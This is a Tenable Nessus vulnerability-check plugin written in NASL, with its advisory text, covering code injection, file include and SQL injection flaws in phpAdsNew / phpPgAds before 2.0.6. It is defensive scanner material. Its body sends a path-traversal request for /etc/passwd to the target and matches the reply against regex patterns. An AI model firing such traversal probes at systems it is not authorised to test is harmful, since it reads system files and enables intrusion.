
phpAdsNew / phpPgAds < 2.0.6 Multiple Vulnerabilities

2005-08-29 00:00:00
This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.
www.tenable.com

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.01

Percentile

84.0%

The remote host is running phpAdsNew / phpPgAds, an open source banner ad server.

The version of phpAdsNew / phpPgAds installed on the remote host is affected by several flaws:

  • Remote PHP Code Injection Vulnerability The XML-RPC library bundled with the application allows an attacker to inject arbitrary PHP code via the ‘adxmlrpc.php’ script; the injected code is executed in the context of the web server user.

  • Multiple Local File Include Vulnerabilities The application fails to sanitize user-supplied input to the ‘layerstyle’ parameter of the ‘adlayer.php’ script and the ‘language’ parameter of the ‘admin/js-form.php’ script before using them to include PHP files for execution. An attacker can exploit these issues to read arbitrary local files, provided PHP’s ‘magic_quotes’ directive is disabled.

  • SQL Injection Vulnerability An attacker can manipulate SQL queries via input to the ‘clientid’ parameter of the ‘libraries/lib-view-direct.inc.php’ script.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');

if (description) {
  # Plugin identity and revision; the ID is what reports and other plugins
  # reference this check by.
  script_id(19518);
  script_version("1.24");

  # CVE / BugTraq cross-references for the flaws listed in the
  # "description" attribute below.
  script_cve_id("CVE-2005-2498", "CVE-2005-2635", "CVE-2005-2636");
  script_bugtraq_id(
    14560, 
    14583, 
    14588, 
    14584, 
    14591
 );

  script_name(english:"phpAdsNew / phpPgAds < 2.0.6 Multiple Vulnerabilities");
 
 # Human-readable report text: one-line synopsis, the full description of
 # the three flaws, vendor/advisory references and the remediation.
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple vulnerabilities." );
 script_set_attribute(attribute:"description", value:
"The remote host is running phpAdsNew / phpPgAds, an open source banner
ad server. 

The version of phpAdsNews / phpPgAds installed on the remote host
suffers from several flaws :

  - Remote PHP Code Injection Vulnerability
    The XML-RPC library bundled with the application allows
    an attacker to inject arbitrary PHP code via the 
    'adxmlrpc.php' script to be executed within the context 
    of the affected web server user id.

  - Multiple Local File Include Vulnerabilities
    The application fails to sanitize user-supplied input to
    the 'layerstyle' parameter of the 'adlayer.php' script 
    and the 'language' parameter of the 'admin/js-form.php' 
    script before using them to include PHP files for 
    execution. An attacker can exploit these issues to read 
    arbitrary local files provided PHP's 'magic_quotes' 
    directive is disabled.

  - SQL Injection Vulnerability
    An attacker can manipulate SQL queries via input to the 
    'clientid' parameter of the 
    'libraries/lib-view-direct.inc.php' script." );
 script_set_attribute(attribute:"see_also", value:"http://www.hardened-php.net/advisory_152005.67.html" );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/408423/30/120/threaded" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to phpAdsNew / phpPgAds 2.0.6 or later." );
  # Risk rating: CVSS2 base vector (network, low complexity, no
  # authentication, partial C/I/A impact) plus the temporal vector.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  # Exploitability metadata as recorded by the plugin author: no exploit
  # code is needed to trigger the flaws, and none is flagged as public.
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
 # Publication / modification dates and classification used by the
 # plugin feed (remote check, CPE of the affected product).
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/08/29");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/08/15");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:phpadsnew:phpadsnew");
script_end_attributes();

 
  # Short summary shown in scan output.
  summary["english"] = "Checks for multiple vulnerabilities in phpAdsNew / phpPgAds < 2.0.6";
  script_summary(english:summary["english"]);
 
  # ACT_ATTACK: this is an active check -- the main body sends a crafted
  # request to the target rather than relying on a version banner -- so it
  # runs in the attack phase and is skipped when CGI scanning is disabled
  # (see script_exclude_keys below).
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.");

  # Prerequisites: the web server fingerprint from http_version.nasl, a www
  # service (port 80 by default) and evidence that the host serves PHP.
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


# Pick the web server port (default 80) and bail out unless it can serve
# PHP; every flaw covered by this plugin lives in PHP scripts.
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);

# Evidence patterns for the adlayer.php 'layerstyle' local file include:
#  - the contents of /etc/passwd came back (an entry for root), or
#  - a PHP warning / fatal error naming /etc/passwd in a failed include.
# The two error-message patterns show the include was attempted even though
# the file could not be opened (consistent with magic_quotes_gpc being on);
# the other flaws in this version do not depend on that setting, so the
# host is still reported in that case.
passwd_pat = "root:.*:0:[01]:";
warn_pat = "Warning.+main\(.+/etc/passwd.+failed to open stream";
fatal_pat = "Fatal error.+ Failed opening required '.+/etc/passwd";

# Probe each known CGI directory.
foreach dir (cgi_dirs()) {
  # Request adlayer.php with a traversal value in 'layerstyle'.
  url = string(
    dir, "/adlayer.php?",
    "layerstyle=../../../../../../../etc/passwd%00"
  );
  reply = http_send_recv3(method:"GET", item:url, port:port);

  # No reply at all means the server stopped answering; give up on the
  # whole check rather than hammering the remaining directories.
  if (isnull(reply)) exit(0);
  body = reply[2];

  vulnerable =
    egrep(string:body, pattern:passwd_pat) ||
    egrep(string:body, pattern:warn_pat) ||
    egrep(string:body, pattern:fatal_pat);

  if (vulnerable) {
    # Report the finding and mark the web app as SQL-injectable for other
    # plugins: the probe exercised the file include, but the description
    # lists a 'clientid' SQL injection in the same affected versions.
    security_hole(port);
    set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
    exit(0);
  }
}
